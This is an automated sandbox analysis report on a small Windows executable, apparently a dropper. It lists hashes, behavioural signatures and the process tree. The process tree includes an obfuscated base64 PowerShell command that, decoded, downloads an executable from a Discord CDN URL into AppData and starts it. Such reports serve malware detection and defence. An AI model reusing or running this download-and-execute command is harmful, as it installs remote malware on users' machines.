Analysis
-
max time kernel
176s -
max time network
254s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
03-12-2022 23:13
Static task
static1
Behavioral task
behavioral1
Sample
asdsadasdsa.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
asdsadasdsa.exe
Resource
win10v2004-20220901-en
General
-
Target
asdsadasdsa.exe
-
Size
6KB
-
MD5
224ad38879a55ecc379737225d02b85c
-
SHA1
260cfe1499c16b381698a462f0997b105add2e9d
-
SHA256
599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6
-
SHA512
fd781fee26055eeb4eed26058146a5423684543099313c8d6f6c4f157e6484c89cc2d7180f5b82555ce5eb194e595bbb5ce4da8f3e0eba7b1bca27a2a66ce335
-
SSDEEP
96:I8J79BlBCF5NTcofNVIIKtgNtUqpkK77mc359ed3ojXrl:z9BuFDNNVI5ONtUqpkK77Rzeda
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1304 powershell.exe 6 1304 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1304 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
asdsadasdsa.exedescription pid process target process PID 560 wrote to memory of 1304 560 asdsadasdsa.exe powershell.exe PID 560 wrote to memory of 1304 560 asdsadasdsa.exe powershell.exe PID 560 wrote to memory of 1304 560 asdsadasdsa.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\asdsadasdsa.exe"C:\Users\Admin\AppData\Local\Temp\asdsadasdsa.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/560-54-0x0000000000950000-0x0000000000958000-memory.dmpFilesize
32KB
-
memory/560-55-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmpFilesize
8KB
-
memory/1304-56-0x0000000000000000-mapping.dmp
-
memory/1304-58-0x000007FEF3AB0000-0x000007FEF44D3000-memory.dmpFilesize
10.1MB
-
memory/1304-60-0x0000000002824000-0x0000000002827000-memory.dmpFilesize
12KB
-
memory/1304-59-0x000007FEF2E90000-0x000007FEF39ED000-memory.dmpFilesize
11.4MB
-
memory/1304-61-0x000000000282B000-0x000000000284A000-memory.dmpFilesize
124KB
-
memory/1304-62-0x0000000002824000-0x0000000002827000-memory.dmpFilesize
12KB
-
memory/1304-63-0x0000000002824000-0x0000000002827000-memory.dmpFilesize
12KB
-
memory/1304-64-0x000000000282B000-0x000000000284A000-memory.dmpFilesize
124KB